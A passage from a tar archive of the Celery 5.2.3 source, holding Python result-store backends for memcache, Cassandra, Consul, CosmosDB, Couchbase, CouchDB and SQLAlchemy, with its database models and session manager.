is_pylibmc, memcache, key_t = import_best_memcache() Client = _Client = memcache.Client if not is_pylibmc: def Client(*args, **kwargs): kwargs.pop('behaviors', None) return _Client(*args, **kwargs) return Client, key_t class DummyClient: def __init__(self, *args, **kwargs): self.cache = _DUMMY_CLIENT_CACHE def get(self, key, *args, **kwargs): return self.cache.get(key) def get_multi(self, keys): cache = self.cache return {k: cache[k] for k in keys if k in cache} def set(self, key, value, *args, **kwargs): self.cache[key] = value def delete(self, key, *args, **kwargs): self.cache.pop(key, None) def incr(self, key, delta=1): return self.cache.incr(key, delta) def touch(self, key, expire): pass backends = { 'memcache': get_best_memcache, 'memcached': get_best_memcache, 'pylibmc': get_best_memcache, 'memory': lambda: (DummyClient, ensure_bytes), } class CacheBackend(KeyValueStoreBackend): """Cache result backend.""" servers = None supports_autoexpire = True supports_native_join = True implements_incr = True def __init__(self, app, expires=None, backend=None, options=None, url=None, **kwargs): options = {} if not options else options super().__init__(app, **kwargs) self.url = url self.options = dict(self.app.conf.cache_backend_options, **options) self.backend = url or backend or self.app.conf.cache_backend if self.backend: self.backend, _, servers = self.backend.partition('://') self.servers = servers.rstrip('/').split(';') self.expires = self.prepare_expires(expires, type=int) try: self.Client, self.key_t = backends[self.backend]() except KeyError: raise ImproperlyConfigured(UNKNOWN_BACKEND.format( self.backend, ', '.join(backends))) self._encode_prefixes() # rencode the keyprefixes def get(self, key): return self.client.get(key) def mget(self, keys): return self.client.get_multi(keys) def set(self, key, value): return self.client.set(key, value, self.expires) def delete(self, key): return self.client.delete(key) def _apply_chord_incr(self, header_result_args, body, **kwargs): chord_key = self.get_key_for_chord(header_result_args[0]) self.client.set(chord_key, 0, time=self.expires) return super()._apply_chord_incr( header_result_args, body, **kwargs) def incr(self, key): return self.client.incr(key) def expire(self, key, value): return self.client.touch(key, value) @cached_property def client(self): return self.Client(self.servers, **self.options) def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs servers = ';'.join(self.servers) backend = f'{self.backend}://{servers}/' kwargs.update( {'backend': backend, 'expires': self.expires, 'options': self.options}) return super().__reduce__(args, kwargs) def as_uri(self, *args, **kwargs): """Return the backend as an URI. This properly handles the case of multiple servers. 
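# Example: selecting the cache backend. A sketch; the URL scheme and server
# addresses are illustrative. Multiple memcached servers are separated by ';'
# (see __init__ above), and the 'memory' client is the in-process DummyClient,
# which is mostly useful for tests.
from celery import Celery

app = Celery('example')
app.conf.result_backend = 'cache+memcached://10.0.0.1:11211;10.0.0.2:11211/'
# in-memory variant (results are shared only within the current process):
# app.conf.result_backend = 'cache+memory://'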
""" servers = ';'.join(self.servers) return f'{self.backend}://{servers}/' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/cassandra.py0000664000175000017500000001732200000000000020250 0ustar00asifasif00000000000000"""Apache Cassandra result store backend using the DataStax driver.""" import threading from celery import states from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger from .base import BaseBackend try: # pragma: no cover import cassandra import cassandra.auth import cassandra.cluster import cassandra.query except ImportError: # pragma: no cover cassandra = None __all__ = ('CassandraBackend',) logger = get_logger(__name__) E_NO_CASSANDRA = """ You need to install the cassandra-driver library to use the Cassandra backend. See https://github.com/datastax/python-driver """ E_NO_SUCH_CASSANDRA_AUTH_PROVIDER = """ CASSANDRA_AUTH_PROVIDER you provided is not a valid auth_provider class. See https://datastax.github.io/python-driver/api/cassandra/auth.html. """ Q_INSERT_RESULT = """ INSERT INTO {table} ( task_id, status, result, date_done, traceback, children) VALUES ( %s, %s, %s, %s, %s, %s) {expires}; """ Q_SELECT_RESULT = """ SELECT status, result, date_done, traceback, children FROM {table} WHERE task_id=%s LIMIT 1 """ Q_CREATE_RESULT_TABLE = """ CREATE TABLE {table} ( task_id text, status text, result blob, date_done timestamp, traceback blob, children blob, PRIMARY KEY ((task_id), date_done) ) WITH CLUSTERING ORDER BY (date_done DESC); """ Q_EXPIRES = """ USING TTL {0} """ def buf_t(x): return bytes(x, 'utf8') class CassandraBackend(BaseBackend): """Cassandra backend utilizing DataStax driver. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`cassandra-driver` is not available, or if the :setting:`cassandra_servers` setting is not set. """ #: List of Cassandra servers with format: ``hostname``. 
servers = None supports_autoexpire = True # autoexpire supported via entry_ttl def __init__(self, servers=None, keyspace=None, table=None, entry_ttl=None, port=9042, **kwargs): super().__init__(**kwargs) if not cassandra: raise ImproperlyConfigured(E_NO_CASSANDRA) conf = self.app.conf self.servers = servers or conf.get('cassandra_servers', None) self.port = port or conf.get('cassandra_port', None) self.keyspace = keyspace or conf.get('cassandra_keyspace', None) self.table = table or conf.get('cassandra_table', None) self.cassandra_options = conf.get('cassandra_options', {}) if not self.servers or not self.keyspace or not self.table: raise ImproperlyConfigured('Cassandra backend not configured.') expires = entry_ttl or conf.get('cassandra_entry_ttl', None) self.cqlexpires = ( Q_EXPIRES.format(expires) if expires is not None else '') read_cons = conf.get('cassandra_read_consistency') or 'LOCAL_QUORUM' write_cons = conf.get('cassandra_write_consistency') or 'LOCAL_QUORUM' self.read_consistency = getattr( cassandra.ConsistencyLevel, read_cons, cassandra.ConsistencyLevel.LOCAL_QUORUM) self.write_consistency = getattr( cassandra.ConsistencyLevel, write_cons, cassandra.ConsistencyLevel.LOCAL_QUORUM) self.auth_provider = None auth_provider = conf.get('cassandra_auth_provider', None) auth_kwargs = conf.get('cassandra_auth_kwargs', None) if auth_provider and auth_kwargs: auth_provider_class = getattr(cassandra.auth, auth_provider, None) if not auth_provider_class: raise ImproperlyConfigured(E_NO_SUCH_CASSANDRA_AUTH_PROVIDER) self.auth_provider = auth_provider_class(**auth_kwargs) self._cluster = None self._session = None self._write_stmt = None self._read_stmt = None self._lock = threading.RLock() def _get_connection(self, write=False): """Prepare the connection for action. Arguments: write (bool): are we a writer? """ if self._session is not None: return self._lock.acquire() try: if self._session is not None: return self._cluster = cassandra.cluster.Cluster( self.servers, port=self.port, auth_provider=self.auth_provider, **self.cassandra_options) self._session = self._cluster.connect(self.keyspace) # We're forced to do concatenation below, as formatting would # blow up on superficial %s that'll be processed by Cassandra self._write_stmt = cassandra.query.SimpleStatement( Q_INSERT_RESULT.format( table=self.table, expires=self.cqlexpires), ) self._write_stmt.consistency_level = self.write_consistency self._read_stmt = cassandra.query.SimpleStatement( Q_SELECT_RESULT.format(table=self.table), ) self._read_stmt.consistency_level = self.read_consistency if write: # Only possible writers "workers" are allowed to issue # CREATE TABLE. This is to prevent conflicting situations # where both task-creator and task-executor would issue it # at the same time. # Anyway; if you're doing anything critical, you should # have created this table in advance, in which case # this query will be a no-op (AlreadyExists) make_stmt = cassandra.query.SimpleStatement( Q_CREATE_RESULT_TABLE.format(table=self.table), ) make_stmt.consistency_level = self.write_consistency try: self._session.execute(make_stmt) except cassandra.AlreadyExists: pass except cassandra.OperationTimedOut: # a heavily loaded or gone Cassandra cluster failed to respond. 
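# Example: configuring the Cassandra backend. A sketch using the setting
# names read in CassandraBackend.__init__() above; hosts, keyspace, table and
# credentials are illustrative.
from celery import Celery

app = Celery('example')
app.conf.result_backend = 'cassandra://'
app.conf.cassandra_servers = ['cassandra1.example.com', 'cassandra2.example.com']
app.conf.cassandra_port = 9042
app.conf.cassandra_keyspace = 'celery'
app.conf.cassandra_table = 'tasks'
app.conf.cassandra_entry_ttl = 86400                 # seconds; adds "USING TTL" to writes
app.conf.cassandra_read_consistency = 'LOCAL_QUORUM'
app.conf.cassandra_write_consistency = 'LOCAL_QUORUM'
# Optional authentication, resolved against cassandra.auth by the code above:
app.conf.cassandra_auth_provider = 'PlainTextAuthProvider'
app.conf.cassandra_auth_kwargs = {'username': 'user', 'password': 'pass'}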
# leave this class in a consistent state if self._cluster is not None: self._cluster.shutdown() # also shuts down _session self._cluster = None self._session = None raise # we did fail after all - reraise finally: self._lock.release() def _store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Store return value and state of an executed task.""" self._get_connection(write=True) self._session.execute(self._write_stmt, ( task_id, state, buf_t(self.encode(result)), self.app.now(), buf_t(self.encode(traceback)), buf_t(self.encode(self.current_task_children(request))) )) def as_uri(self, include_password=True): return 'cassandra://' def _get_task_meta_for(self, task_id): """Get task meta-data for a task by id.""" self._get_connection() res = self._session.execute(self._read_stmt, (task_id, )).one() if not res: return {'status': states.PENDING, 'result': None} status, result, date_done, traceback, children = res return self.meta_from_decoded({ 'task_id': task_id, 'status': status, 'result': self.decode(result), 'date_done': date_done, 'traceback': self.decode(traceback), 'children': self.decode(children), }) def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs kwargs.update( {'servers': self.servers, 'keyspace': self.keyspace, 'table': self.table}) return super().__reduce__(args, kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/consul.py0000664000175000017500000000735000000000000017614 0ustar00asifasif00000000000000"""Consul result store backend. - :class:`ConsulBackend` implements KeyValueStoreBackend to store results in the key-value store of Consul. """ from kombu.utils.encoding import bytes_to_str from kombu.utils.url import parse_url from celery.backends.base import KeyValueStoreBackend from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger try: import consul except ImportError: consul = None logger = get_logger(__name__) __all__ = ('ConsulBackend',) CONSUL_MISSING = """\ You need to install the python-consul library in order to use \ the Consul result store backend.""" class ConsulBackend(KeyValueStoreBackend): """Consul.io K/V store backend for Celery.""" consul = consul supports_autoexpire = True consistency = 'consistent' path = None def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) if self.consul is None: raise ImproperlyConfigured(CONSUL_MISSING) # # By default, for correctness, we use a client connection per # operation. If set, self.one_client will be used for all operations. # This provides for the original behaviour to be selected, and is # also convenient for mocking in the unit tests. # self.one_client = None self._init_from_params(**parse_url(self.url)) def _init_from_params(self, hostname, port, virtual_host, **params): logger.debug('Setting on Consul client to connect to %s:%d', hostname, port) self.path = virtual_host self.hostname = hostname self.port = port # # Optionally, allow a single client connection to be used to reduce # the connection load on Consul by adding a "one_client=1" parameter # to the URL. 
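# Example: a Consul result backend URL. A sketch; host, port and path are
# illustrative. The path becomes the key prefix, and appending one_client=1
# reuses a single client connection instead of one per operation, as the
# comment above describes.
from celery import Celery

app = Celery('example')
app.conf.result_backend = 'consul://127.0.0.1:8500/celery?one_client=1'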
# if params.get('one_client', None): self.one_client = self.client() def client(self): return self.one_client or consul.Consul(host=self.hostname, port=self.port, consistency=self.consistency) def _key_to_consul_key(self, key): key = bytes_to_str(key) return key if self.path is None else f'{self.path}/{key}' def get(self, key): key = self._key_to_consul_key(key) logger.debug('Trying to fetch key %s from Consul', key) try: _, data = self.client().kv.get(key) return data['Value'] except TypeError: pass def mget(self, keys): for key in keys: yield self.get(key) def set(self, key, value): """Set a key in Consul. Before creating the key it will create a session inside Consul where it creates a session with a TTL The key created afterwards will reference to the session's ID. If the session expires it will remove the key so that results can auto expire from the K/V store """ session_name = bytes_to_str(key) key = self._key_to_consul_key(key) logger.debug('Trying to create Consul session %s with TTL %d', session_name, self.expires) client = self.client() session_id = client.session.create(name=session_name, behavior='delete', ttl=self.expires) logger.debug('Created Consul session %s', session_id) logger.debug('Writing key %s to Consul', key) return client.kv.put(key=key, value=value, acquire=session_id) def delete(self, key): key = self._key_to_consul_key(key) logger.debug('Removing key %s from Consul', key) return self.client().kv.delete(key) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/cosmosdbsql.py0000664000175000017500000001526700000000000020650 0ustar00asifasif00000000000000"""The CosmosDB/SQL backend for Celery (experimental).""" from kombu.utils import cached_property from kombu.utils.encoding import bytes_to_str from kombu.utils.url import _parse_url from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger from .base import KeyValueStoreBackend try: import pydocumentdb from pydocumentdb.document_client import DocumentClient from pydocumentdb.documents import (ConnectionPolicy, ConsistencyLevel, PartitionKind) from pydocumentdb.errors import HTTPFailure from pydocumentdb.retry_options import RetryOptions except ImportError: # pragma: no cover pydocumentdb = DocumentClient = ConsistencyLevel = PartitionKind = \ HTTPFailure = ConnectionPolicy = RetryOptions = None __all__ = ("CosmosDBSQLBackend",) ERROR_NOT_FOUND = 404 ERROR_EXISTS = 409 LOGGER = get_logger(__name__) class CosmosDBSQLBackend(KeyValueStoreBackend): """CosmosDB/SQL backend for Celery.""" def __init__(self, url=None, database_name=None, collection_name=None, consistency_level=None, max_retry_attempts=None, max_retry_wait_time=None, *args, **kwargs): super().__init__(*args, **kwargs) if pydocumentdb is None: raise ImproperlyConfigured( "You need to install the pydocumentdb library to use the " "CosmosDB backend.") conf = self.app.conf self._endpoint, self._key = self._parse_url(url) self._database_name = ( database_name or conf["cosmosdbsql_database_name"]) self._collection_name = ( collection_name or conf["cosmosdbsql_collection_name"]) try: self._consistency_level = getattr( ConsistencyLevel, consistency_level or conf["cosmosdbsql_consistency_level"]) except AttributeError: raise ImproperlyConfigured("Unknown CosmosDB consistency level") self._max_retry_attempts = ( max_retry_attempts or conf["cosmosdbsql_max_retry_attempts"]) self._max_retry_wait_time = ( max_retry_wait_time or 
conf["cosmosdbsql_max_retry_wait_time"]) @classmethod def _parse_url(cls, url): _, host, port, _, password, _, _ = _parse_url(url) if not host or not password: raise ImproperlyConfigured("Invalid URL") if not port: port = 443 scheme = "https" if port == 443 else "http" endpoint = f"{scheme}://{host}:{port}" return endpoint, password @cached_property def _client(self): """Return the CosmosDB/SQL client. If this is the first call to the property, the client is created and the database and collection are initialized if they don't yet exist. """ connection_policy = ConnectionPolicy() connection_policy.RetryOptions = RetryOptions( max_retry_attempt_count=self._max_retry_attempts, max_wait_time_in_seconds=self._max_retry_wait_time) client = DocumentClient( self._endpoint, {"masterKey": self._key}, connection_policy=connection_policy, consistency_level=self._consistency_level) self._create_database_if_not_exists(client) self._create_collection_if_not_exists(client) return client def _create_database_if_not_exists(self, client): try: client.CreateDatabase({"id": self._database_name}) except HTTPFailure as ex: if ex.status_code != ERROR_EXISTS: raise else: LOGGER.info("Created CosmosDB database %s", self._database_name) def _create_collection_if_not_exists(self, client): try: client.CreateCollection( self._database_link, {"id": self._collection_name, "partitionKey": {"paths": ["/id"], "kind": PartitionKind.Hash}}) except HTTPFailure as ex: if ex.status_code != ERROR_EXISTS: raise else: LOGGER.info("Created CosmosDB collection %s/%s", self._database_name, self._collection_name) @cached_property def _database_link(self): return "dbs/" + self._database_name @cached_property def _collection_link(self): return self._database_link + "/colls/" + self._collection_name def _get_document_link(self, key): return self._collection_link + "/docs/" + key @classmethod def _get_partition_key(cls, key): if not key or key.isspace(): raise ValueError("Key cannot be none, empty or whitespace.") return {"partitionKey": key} def get(self, key): """Read the value stored at the given key. Args: key: The key for which to read the value. """ key = bytes_to_str(key) LOGGER.debug("Getting CosmosDB document %s/%s/%s", self._database_name, self._collection_name, key) try: document = self._client.ReadDocument( self._get_document_link(key), self._get_partition_key(key)) except HTTPFailure as ex: if ex.status_code != ERROR_NOT_FOUND: raise return None else: return document.get("value") def set(self, key, value): """Store a value for a given key. Args: key: The key at which to store the value. value: The value to store. """ key = bytes_to_str(key) LOGGER.debug("Creating CosmosDB document %s/%s/%s", self._database_name, self._collection_name, key) self._client.CreateDocument( self._collection_link, {"id": key, "value": value}, self._get_partition_key(key)) def mget(self, keys): """Read all the values for the provided keys. Args: keys: The list of keys to read. """ return [self.get(key) for key in keys] def delete(self, key): """Delete the value at a given key. Args: key: The key of the value to delete. 
""" key = bytes_to_str(key) LOGGER.debug("Deleting CosmosDB document %s/%s/%s", self._database_name, self._collection_name, key) self._client.DeleteDocument( self._get_document_link(key), self._get_partition_key(key)) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/couchbase.py0000664000175000017500000000614500000000000020246 0ustar00asifasif00000000000000"""Couchbase result store backend.""" from kombu.utils.url import _parse_url from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: from couchbase.auth import PasswordAuthenticator from couchbase.cluster import Cluster, ClusterOptions from couchbase_core._libcouchbase import FMT_AUTO except ImportError: Cluster = PasswordAuthenticator = ClusterOptions = None __all__ = ('CouchbaseBackend',) class CouchbaseBackend(KeyValueStoreBackend): """Couchbase backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`couchbase` is not available. """ bucket = 'default' host = 'localhost' port = 8091 username = None password = None quiet = False supports_autoexpire = True timeout = 2.5 # Use str as couchbase key not bytes key_t = str def __init__(self, url=None, *args, **kwargs): kwargs.setdefault('expires_type', int) super().__init__(*args, **kwargs) self.url = url if Cluster is None: raise ImproperlyConfigured( 'You need to install the couchbase library to use the ' 'Couchbase backend.', ) uhost = uport = uname = upass = ubucket = None if url: _, uhost, uport, uname, upass, ubucket, _ = _parse_url(url) ubucket = ubucket.strip('/') if ubucket else None config = self.app.conf.get('couchbase_backend_settings', None) if config is not None: if not isinstance(config, dict): raise ImproperlyConfigured( 'Couchbase backend settings should be grouped in a dict', ) else: config = {} self.host = uhost or config.get('host', self.host) self.port = int(uport or config.get('port', self.port)) self.bucket = ubucket or config.get('bucket', self.bucket) self.username = uname or config.get('username', self.username) self.password = upass or config.get('password', self.password) self._connection = None def _get_connection(self): """Connect to the Couchbase server.""" if self._connection is None: if self.host and self.port: uri = f"couchbase://{self.host}:{self.port}" else: uri = f"couchbase://{self.host}" if self.username and self.password: opt = PasswordAuthenticator(self.username, self.password) else: opt = None cluster = Cluster(uri, opt) bucket = cluster.bucket(self.bucket) self._connection = bucket.default_collection() return self._connection @property def connection(self): return self._get_connection() def get(self, key): return self.connection.get(key).content def set(self, key, value): self.connection.upsert(key, value, ttl=self.expires, format=FMT_AUTO) def mget(self, keys): return self.connection.get_multi(keys) def delete(self, key): self.connection.remove(key) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/couchdb.py0000664000175000017500000000556700000000000017730 0ustar00asifasif00000000000000"""CouchDB result store backend.""" from kombu.utils.encoding import bytes_to_str from kombu.utils.url import _parse_url from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: import pycouchdb except ImportError: pycouchdb = None __all__ = ('CouchBackend',) ERR_LIB_MISSING = """\ You need to install 
the pycouchdb library to use the CouchDB result backend\ """ class CouchBackend(KeyValueStoreBackend): """CouchDB backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`pycouchdb` is not available. """ container = 'default' scheme = 'http' host = 'localhost' port = 5984 username = None password = None def __init__(self, url=None, *args, **kwargs): super().__init__(*args, **kwargs) self.url = url if pycouchdb is None: raise ImproperlyConfigured(ERR_LIB_MISSING) uscheme = uhost = uport = uname = upass = ucontainer = None if url: _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url) ucontainer = ucontainer.strip('/') if ucontainer else None self.scheme = uscheme or self.scheme self.host = uhost or self.host self.port = int(uport or self.port) self.container = ucontainer or self.container self.username = uname or self.username self.password = upass or self.password self._connection = None def _get_connection(self): """Connect to the CouchDB server.""" if self.username and self.password: conn_string = f'{self.scheme}://{self.username}:{self.password}@{self.host}:{self.port}' server = pycouchdb.Server(conn_string, authmethod='basic') else: conn_string = f'{self.scheme}://{self.host}:{self.port}' server = pycouchdb.Server(conn_string) try: return server.database(self.container) except pycouchdb.exceptions.NotFound: return server.create(self.container) @property def connection(self): if self._connection is None: self._connection = self._get_connection() return self._connection def get(self, key): key = bytes_to_str(key) try: return self.connection.get(key)['value'] except pycouchdb.exceptions.NotFound: return None def set(self, key, value): key = bytes_to_str(key) data = {'_id': key, 'value': value} try: self.connection.save(data) except pycouchdb.exceptions.Conflict: # document already exists, update it data = self.connection.get(key) data['value'] = value self.connection.save(data) def mget(self, keys): return [self.get(key) for key in keys] def delete(self, key): self.connection.delete(key) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4037497 celery-5.2.3/celery/backends/database/0000775000175000017500000000000000000000000017476 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/database/__init__.py0000664000175000017500000001713300000000000021614 0ustar00asifasif00000000000000"""SQLAlchemy result store backend.""" import logging from contextlib import contextmanager from vine.utils import wraps from celery import states from celery.backends.base import BaseBackend from celery.exceptions import ImproperlyConfigured from celery.utils.time import maybe_timedelta from .models import Task, TaskExtended, TaskSet from .session import SessionManager try: from sqlalchemy.exc import DatabaseError, InvalidRequestError from sqlalchemy.orm.exc import StaleDataError except ImportError: # pragma: no cover raise ImproperlyConfigured( 'The database result backend requires SQLAlchemy to be installed.' 
'See https://pypi.org/project/SQLAlchemy/') logger = logging.getLogger(__name__) __all__ = ('DatabaseBackend',) @contextmanager def session_cleanup(session): try: yield except Exception: session.rollback() raise finally: session.close() def retry(fun): @wraps(fun) def _inner(*args, **kwargs): max_retries = kwargs.pop('max_retries', 3) for retries in range(max_retries): try: return fun(*args, **kwargs) except (DatabaseError, InvalidRequestError, StaleDataError): logger.warning( 'Failed operation %s. Retrying %s more times.', fun.__name__, max_retries - retries - 1, exc_info=True) if retries + 1 >= max_retries: raise return _inner class DatabaseBackend(BaseBackend): """The database result backend.""" # ResultSet.iterate should sleep this much between each pool, # to not bombard the database with queries. subpolling_interval = 0.5 task_cls = Task taskset_cls = TaskSet def __init__(self, dburi=None, engine_options=None, url=None, **kwargs): # The `url` argument was added later and is used by # the app to set backend by url (celery.app.backends.by_url) super().__init__(expires_type=maybe_timedelta, url=url, **kwargs) conf = self.app.conf if self.extended_result: self.task_cls = TaskExtended self.url = url or dburi or conf.database_url self.engine_options = dict( engine_options or {}, **conf.database_engine_options or {}) self.short_lived_sessions = kwargs.get( 'short_lived_sessions', conf.database_short_lived_sessions) schemas = conf.database_table_schemas or {} tablenames = conf.database_table_names or {} self.task_cls.configure( schema=schemas.get('task'), name=tablenames.get('task')) self.taskset_cls.configure( schema=schemas.get('group'), name=tablenames.get('group')) if not self.url: raise ImproperlyConfigured( 'Missing connection string! Do you have the' ' database_url setting set to a real value?') @property def extended_result(self): return self.app.conf.find_value_for_key('extended', 'result') def ResultSession(self, session_manager=SessionManager()): return session_manager.session_factory( dburi=self.url, short_lived_sessions=self.short_lived_sessions, **self.engine_options) @retry def _store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Store return value and state of an executed task.""" session = self.ResultSession() with session_cleanup(session): task = list(session.query(self.task_cls).filter(self.task_cls.task_id == task_id)) task = task and task[0] if not task: task = self.task_cls(task_id) task.task_id = task_id session.add(task) session.flush() self._update_result(task, result, state, traceback=traceback, request=request) session.commit() def _update_result(self, task, result, state, traceback=None, request=None): meta = self._get_result_meta(result=result, state=state, traceback=traceback, request=request, format_date=False, encode=True) # Exclude the primary key id and task_id columns # as we should not set it None columns = [column.name for column in self.task_cls.__table__.columns if column.name not in {'id', 'task_id'}] # Iterate through the columns name of the table # to set the value from meta. 
# If the value is not present in meta, set None for column in columns: value = meta.get(column) setattr(task, column, value) @retry def _get_task_meta_for(self, task_id): """Get task meta-data for a task by id.""" session = self.ResultSession() with session_cleanup(session): task = list(session.query(self.task_cls).filter(self.task_cls.task_id == task_id)) task = task and task[0] if not task: task = self.task_cls(task_id) task.status = states.PENDING task.result = None data = task.to_dict() if data.get('args', None) is not None: data['args'] = self.decode(data['args']) if data.get('kwargs', None) is not None: data['kwargs'] = self.decode(data['kwargs']) return self.meta_from_decoded(data) @retry def _save_group(self, group_id, result): """Store the result of an executed group.""" session = self.ResultSession() with session_cleanup(session): group = self.taskset_cls(group_id, result) session.add(group) session.flush() session.commit() return result @retry def _restore_group(self, group_id): """Get meta-data for group by id.""" session = self.ResultSession() with session_cleanup(session): group = session.query(self.taskset_cls).filter( self.taskset_cls.taskset_id == group_id).first() if group: return group.to_dict() @retry def _delete_group(self, group_id): """Delete meta-data for group by id.""" session = self.ResultSession() with session_cleanup(session): session.query(self.taskset_cls).filter( self.taskset_cls.taskset_id == group_id).delete() session.flush() session.commit() @retry def _forget(self, task_id): """Forget about result.""" session = self.ResultSession() with session_cleanup(session): session.query(self.task_cls).filter(self.task_cls.task_id == task_id).delete() session.commit() def cleanup(self): """Delete expired meta-data.""" session = self.ResultSession() expires = self.expires now = self.app.now() with session_cleanup(session): session.query(self.task_cls).filter( self.task_cls.date_done < (now - expires)).delete() session.query(self.taskset_cls).filter( self.taskset_cls.date_done < (now - expires)).delete() session.commit() def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs kwargs.update( {'dburi': self.url, 'expires': self.expires, 'engine_options': self.engine_options}) return super().__reduce__(args, kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/database/models.py0000664000175000017500000000642700000000000021344 0ustar00asifasif00000000000000"""Database models used by the SQLAlchemy result store backend.""" from datetime import datetime import sqlalchemy as sa from sqlalchemy.types import PickleType from celery import states from .session import ResultModelBase __all__ = ('Task', 'TaskExtended', 'TaskSet') class Task(ResultModelBase): """Task result/status.""" __tablename__ = 'celery_taskmeta' __table_args__ = {'sqlite_autoincrement': True} id = sa.Column(sa.Integer, sa.Sequence('task_id_sequence'), primary_key=True, autoincrement=True) task_id = sa.Column(sa.String(155), unique=True) status = sa.Column(sa.String(50), default=states.PENDING) result = sa.Column(PickleType, nullable=True) date_done = sa.Column(sa.DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=True) traceback = sa.Column(sa.Text, nullable=True) def __init__(self, task_id): self.task_id = task_id def to_dict(self): return { 'task_id': self.task_id, 'status': self.status, 'result': self.result, 'traceback': self.traceback, 'date_done': self.date_done, } 
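# Illustrative note added by the editor (not part of the original source):
# to_dict() returns the raw column values for this row, roughly
#   {'task_id': '3c7f...', 'status': 'SUCCESS', 'result': 4,
#    'traceback': None, 'date_done': datetime.datetime(2021, 12, 29, ...)}
# with hypothetical values; DatabaseBackend._get_task_meta_for() feeds this
# dict into meta_from_decoded().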
def __repr__(self): return '<Task {0.task_id} state: {0.status}>'.format(self) @classmethod def configure(cls, schema=None, name=None): cls.__table__.schema = schema cls.id.default.schema = schema cls.__table__.name = name or cls.__tablename__ class TaskExtended(Task): """For the extend result.""" __tablename__ = 'celery_taskmeta' __table_args__ = {'sqlite_autoincrement': True, 'extend_existing': True} name = sa.Column(sa.String(155), nullable=True) args = sa.Column(sa.LargeBinary, nullable=True) kwargs = sa.Column(sa.LargeBinary, nullable=True) worker = sa.Column(sa.String(155), nullable=True) retries = sa.Column(sa.Integer, nullable=True) queue = sa.Column(sa.String(155), nullable=True) def to_dict(self): task_dict = super().to_dict() task_dict.update({ 'name': self.name, 'args': self.args, 'kwargs': self.kwargs, 'worker': self.worker, 'retries': self.retries, 'queue': self.queue, }) return task_dict class TaskSet(ResultModelBase): """TaskSet result.""" __tablename__ = 'celery_tasksetmeta' __table_args__ = {'sqlite_autoincrement': True} id = sa.Column(sa.Integer, sa.Sequence('taskset_id_sequence'), autoincrement=True, primary_key=True) taskset_id = sa.Column(sa.String(155), unique=True) result = sa.Column(PickleType, nullable=True) date_done = sa.Column(sa.DateTime, default=datetime.utcnow, nullable=True) def __init__(self, taskset_id, result): self.taskset_id = taskset_id self.result = result def to_dict(self): return { 'taskset_id': self.taskset_id, 'result': self.result, 'date_done': self.date_done, } def __repr__(self): return f'<TaskSet: {self.taskset_id}>' @classmethod def configure(cls, schema=None, name=None): cls.__table__.schema = schema cls.id.default.schema = schema cls.__table__.name = name or cls.__tablename__ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/database/session.py0000664000175000017500000000570300000000000021540 0ustar00asifasif00000000000000"""SQLAlchemy session.""" import time from kombu.utils.compat import register_after_fork from sqlalchemy import create_engine from sqlalchemy.exc import DatabaseError from sqlalchemy.orm import sessionmaker from sqlalchemy.pool import NullPool from celery.utils.time import get_exponential_backoff_interval try: from sqlalchemy.orm import declarative_base except ImportError: # TODO: Remove this once we drop support for SQLAlchemy < 1.4.
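# Note added by the editor (not part of the original source):
# declarative_base() moved to ``sqlalchemy.orm`` in SQLAlchemy 1.4; the
# import below is the pre-1.4 location, kept as a fallback for older
# SQLAlchemy releases.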
from sqlalchemy.ext.declarative import declarative_base ResultModelBase = declarative_base() __all__ = ('SessionManager',) PREPARE_MODELS_MAX_RETRIES = 10 def _after_fork_cleanup_session(session): session._after_fork() class SessionManager: """Manage SQLAlchemy sessions.""" def __init__(self): self._engines = {} self._sessions = {} self.forked = False self.prepared = False if register_after_fork is not None: register_after_fork(self, _after_fork_cleanup_session) def _after_fork(self): self.forked = True def get_engine(self, dburi, **kwargs): if self.forked: try: return self._engines[dburi] except KeyError: engine = self._engines[dburi] = create_engine(dburi, **kwargs) return engine else: kwargs = {k: v for k, v in kwargs.items() if not k.startswith('pool')} return create_engine(dburi, poolclass=NullPool, **kwargs) def create_session(self, dburi, short_lived_sessions=False, **kwargs): engine = self.get_engine(dburi, **kwargs) if self.forked: if short_lived_sessions or dburi not in self._sessions: self._sessions[dburi] = sessionmaker(bind=engine) return engine, self._sessions[dburi] return engine, sessionmaker(bind=engine) def prepare_models(self, engine): if not self.prepared: # SQLAlchemy will check if the items exist before trying to # create them, which is a race condition. If it raises an error # in one iteration, the next may pass all the existence checks # and the call will succeed. retries = 0 while True: try: ResultModelBase.metadata.create_all(engine) except DatabaseError: if retries < PREPARE_MODELS_MAX_RETRIES: sleep_amount_ms = get_exponential_backoff_interval( 10, retries, 1000, True ) time.sleep(sleep_amount_ms / 1000) retries += 1 else: raise else: break self.prepared = True def session_factory(self, 